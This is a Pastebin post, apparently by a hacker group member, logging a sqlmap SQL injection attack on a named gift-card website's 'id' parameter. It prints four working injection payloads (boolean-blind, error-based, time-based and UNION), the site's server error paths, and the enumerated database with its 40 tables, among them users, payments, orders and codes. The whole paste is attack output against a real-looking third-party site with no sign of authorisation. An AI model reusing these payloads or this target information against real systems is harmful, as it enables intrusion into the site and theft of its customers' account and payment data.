Advertisement
hackerpham

Tested by D4RK☆DR4G0N 2

Jul 30th, 2018
164
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.71 KB | None | 0 0
  1. ---------------------------------------------------------------------------------------------------------------------------------------- Checked_By_The_D4RK☆DR4G0N | ☆☆☆Hell Wolf Security Professional -
  2. ---------------------------------------------------------------------------------------------------------------------------------------
  3. ☆ Target: http://worldofgiftcard.com/categories_list.php?id=17
  4. ☆ Errors:
  5. Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in /home/content/00/11156600/html/categories_list.php on line 5
  6. ☆ Tested: 30/07/2018
  7. Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/content/00/11156600/html/categories_list.php on line 6
  8.  
  9. sqlmap identified the following injection point(s) with a total of 126 HTTP(s) requests:
  10. ---
  11. Parameter: id (GET)
  12. Type: boolean-based blind
  13. Title: AND boolean-based blind - WHERE or HAVING clause
  14. Payload: id=17' AND 3483=3483 AND 'WXVE'='WXVE
  15.  
  16. Type: error-based
  17. Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  18. Payload: id=17' AND ROW(4489,1850)>(SELECT COUNT(*),CONCAT(0x717a6b6a71,(SELECT (ELT(4489=4489,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM (SELECT 6083 UNION SELECT 7187 UNION SELECT 3924 UNION SELECT 1971)a GROUP BY x) AND 'nWVt'='nWVt
  19.  
  20. Type: AND/OR time-based blind
  21. Title: MySQL >= 5.0.12 AND time-based blind
  22. Payload: id=17' AND SLEEP(5) AND 'iWmq'='iWmq
  23.  
  24. Type: UNION query
  25. Title: MySQL UNION query (NULL) - 7 columns
  26. Payload: id=17' UNION ALL SELECT NULL,CONCAT(0x717a6b6a71,0x5949427258766e71774e53636562444b494f55726e5a64557248496f676e62716a5076524c6c6a55,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL#
  27. ---
  28. web application technology: Apache
  29. back-end DBMS: MySQL >= 4.1
  30. available databases [2]:
  31. [*] BDGIFTCARD
  32. [*] INFORMATION_SCHEMA
  33.  
  34. Database: BDGIFTCARD
  35. [40 tables]
  36. +---------------------------------------------------------------+
  37. | BDGIFTCARDRMFOCLARTICULOS |
  38. | BDGIFTCARDRMFOCLCART |
  39. | BDGIFTCARDRMFOCLCATEGORIES |
  40. | BDGIFTCARDRMFOCLCODES |
  41. | BDGIFTCARDRMFOCLCURRENCY |
  42. | BDGIFTCARDRMFOCLDEVELOPERS |
  43. | BDGIFTCARDRMFOCLLINKS |
  44. | BDGIFTCARDRMFOCLORDERS |
  45. | BDGIFTCARDRMFOCLPAYMENTS |
  46. | BDGIFTCARDRMFOCLPLATFORMS |
  47. | BDGIFTCARDRMFOCLPRICES |
  48. | BDGIFTCARDRMFOCLQUESTIONS |
  49. | BDGIFTCARDRMFOCLRATINGS |
  50. | BDGIFTCARDRMFOCLREGIONS |
  51. | BDGIFTCARDRMFOCLUSERS |
  52. | INFORMATION_SCHEMARMFOCLCHARACTER_SETS |
  53. | INFORMATION_SCHEMARMFOCLCLIENT_STATISTICS |
  54. | INFORMATION_SCHEMARMFOCLCOLLATIONS |
  55. | INFORMATION_SCHEMARMFOCLCOLLATION_CHARACTER_SET_APPLICABILITY |
  56. | INFORMATION_SCHEMARMFOCLCOLUMNS |
  57. | INFORMATION_SCHEMARMFOCLCOLUMN_PRIVILEGES |
  58. | INFORMATION_SCHEMARMFOCLINDEX_STATISTICS |
  59. | INFORMATION_SCHEMARMFOCLINNODB_BUFFER_POOL_CONTENT |
  60. | INFORMATION_SCHEMARMFOCLINNODB_IO_PATTERN |
  61. | INFORMATION_SCHEMARMFOCLINNODB_RSEG |
  62. | INFORMATION_SCHEMARMFOCLKEY_COLUMN_USAGE |
  63. | INFORMATION_SCHEMARMFOCLPROCESSLIST |
  64. | INFORMATION_SCHEMARMFOCLPROFILING |
  65. | INFORMATION_SCHEMARMFOCLROUTINES |
  66. | INFORMATION_SCHEMARMFOCLSCHEMATA |
  67. | INFORMATION_SCHEMARMFOCLSCHEMA_PRIVILEGES |
  68. | INFORMATION_SCHEMARMFOCLSTATISTICS |
  69. | INFORMATION_SCHEMARMFOCLTABLES |
  70. | INFORMATION_SCHEMARMFOCLTABLE_CONSTRAINTS |
  71. | INFORMATION_SCHEMARMFOCLTABLE_PRIVILEGES |
  72. | INFORMATION_SCHEMARMFOCLTABLE_STATISTICS |
  73. | INFORMATION_SCHEMARMFOCLTRIGGERS |
  74. | INFORMATION_SCHEMARMFOCLUSER_PRIVILEGES |
  75. | INFORMATION_SCHEMARMFOCLUSER_STATISTICS |
  76. | INFORMATION_SCHEMARMFOCLVIEWS |
  77. +---------------------------------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement